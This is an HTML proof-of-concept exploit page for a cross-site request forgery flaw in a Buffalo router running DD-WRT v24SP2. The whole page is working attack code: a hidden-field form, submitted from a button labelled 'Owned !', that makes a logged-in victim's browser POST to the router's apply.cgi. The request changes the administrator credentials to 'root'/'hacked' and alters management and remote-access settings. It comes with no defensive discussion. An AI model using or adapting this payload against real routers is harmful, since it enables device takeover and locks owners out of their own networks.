&lt;html&gt;
  &lt;!-- Exploit Code by Prayas Kulshrestha --&gt;
  &lt;body&gt;
  &lt;h1&gt;This is the PoC for the CSRF vulnerability in the buffalo router Powered by DD-WRT v24SP2-MULTI (10/31/11) std (SVN revision 17798)&lt;/h1&gt;
  &lt;h2&gt;click below to see the magic&lt;h2&gt;

    &lt;form action=&quot;http://www.example.com/apply.cgi&quot; method=&quot;POST&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;submit_button&quot; value=&quot;Management&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;action&quot; value=&quot;ApplyTake&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;change_action&quot; value=&quot;&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;submit_type&quot; value=&quot;&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;commit&quot; value=&quot;1&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;PasswdModify&quot; value=&quot;0&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;remote_mgt_https&quot; value=&quot;0&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;http_enable&quot; value=&quot;1&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;info_passwd&quot; value=&quot;0&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;https_enable&quot; value=&quot;0&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;http_username&quot; value=&quot;root&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;http_passwd&quot; value=&quot;hacked&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;http_passwdConfirm&quot; value=&quot;hacked&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;_http_enable&quot; value=&quot;1&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;refresh_time&quot; value=&quot;3&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;status_auth&quot; value=&quot;1&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;maskmac&quot; value=&quot;1&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;remote_management&quot; value=&quot;0&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;remote_mgt_ssh&quot; value=&quot;0&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;remote_mgt_telnet&quot; value=&quot;0&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;remote_ip_any&quot; value=&quot;1&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;remote_ip&quot; value=&quot;4&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;remote_ip_0&quot; value=&quot;0&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;remote_ip_1&quot; value=&quot;0&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;remote_ip_2&quot; value=&quot;0&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;remote_ip_3&quot; value=&quot;0&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;remote_ip_4&quot; value=&quot;0&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;boot_wait&quot; value=&quot;on&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;cron_enable&quot; value=&quot;1&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;cron_jobs&quot; value=&quot;&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;nas_enable&quot; value=&quot;1&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;resetbutton_enable&quot; value=&quot;1&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;zebra_enable&quot; value=&quot;1&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;ipv6_enable0&quot; value=&quot;0&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;radvd_enable&quot; value=&quot;0&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;radvd_conf&quot; value=&quot;&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;enable_jffs2&quot; value=&quot;0&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;clean_jffs2&quot; value=&quot;0&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;language&quot; value=&quot;english&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;tcp_congestion_control&quot; value=&quot;vegas&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;ip_conntrack_max&quot; value=&quot;4096&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;ip_conntrack_tcp_timeouts&quot; value=&quot;3600&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;ip_conntrack_udp_timeouts&quot; value=&quot;120&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;samba_mount&quot; value=&quot;0&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;samba_share&quot; value=&quot;//yourserverip/yourshare&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;samba_user&quot; value=&quot;username/computer&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;samba_password&quot; value=&quot;iwer573495u7340&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;samba_script&quot; value=&quot;yourscript&quot; /&gt;
      &lt;input type=&quot;submit&quot; value=&quot;Owned !&quot; /&gt;
    &lt;/form&gt;
  &lt;/body&gt;
&lt;/html&gt;
